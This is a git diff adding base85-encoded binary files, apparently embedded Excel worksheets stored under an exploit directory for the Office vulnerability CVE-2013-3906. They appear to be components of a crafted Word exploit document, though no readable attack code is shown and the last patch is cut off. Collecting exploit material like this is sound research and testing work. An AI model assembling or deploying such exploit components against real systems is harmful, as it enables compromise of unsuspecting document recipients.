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
Q0MMX6TqtMx$iKh+4+=SqZvX%Q

literal 0
HcmV?d00001

diff --git a/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet5.xlsx b/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet5.xlsx
new file mode 100755
index 0000000000000000000000000000000000000000..60bfccf3c6009d9dc2e5e0340873021246ed6bfc
GIT binary patch
literal 8542
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
R0{}2!KYSQwd4b>G{s-N<m;(R+

literal 0
HcmV?d00001

diff --git a/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet6.xlsx b/data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet6.xlsx
new file mode 100755
index 0000000000000000000000000000000000000000..e74fe9072fdc38d05cbc49cb99ba213c5338385c
GIT binary patch
literal 8543
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
